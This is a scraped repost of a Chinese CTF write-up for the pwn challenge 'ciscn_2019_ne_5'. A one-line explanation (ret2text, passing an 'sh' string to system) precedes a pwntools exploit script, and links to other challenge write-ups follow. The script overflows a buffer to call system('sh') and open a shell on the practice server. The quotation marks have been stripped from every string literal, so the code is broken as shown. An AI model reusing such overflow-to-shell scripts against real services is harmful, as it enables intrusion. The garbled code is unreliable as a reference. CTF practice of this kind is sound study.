ciscn_2019_ne_5

Posted gaonuoqi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ciscn_2019_ne_5相关的知识,希望对你有一定的参考价值。

ret2text类型

从fflush中获取 “sh”   传参给system即可

技术图片

 

 脚本如下

from pwn import *

r=remote(node3.buuoj.cn,25488)
e=ELF(ciscn_2019_ne_5)
sys_plt=e.plt[system]
sh_addr=0x80482ea

r.recvuntil(Please input admin password:)
r.sendline(administrator)

r.recvuntil(0.Exit
:)
r.sendline(1)

payload=a*0x4c+p32(sys_plt)+aaaa+p32(sh_addr)
r.recvuntil(Please input new log info:)
r.sendline(payload)

r.recvuntil(0.Exit
:)
r.sendline(4)

r.interactive()

 

以上是关于ciscn_2019_ne_5的主要内容,如果未能解决你的问题,请参考以下文章

&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&

ciscn_2019_es_4

ciscn_2019_n_3 Writeup

ciscn_2019_es_7

ciscn_2019_c_1 Writeup

ciscn_2019_es_2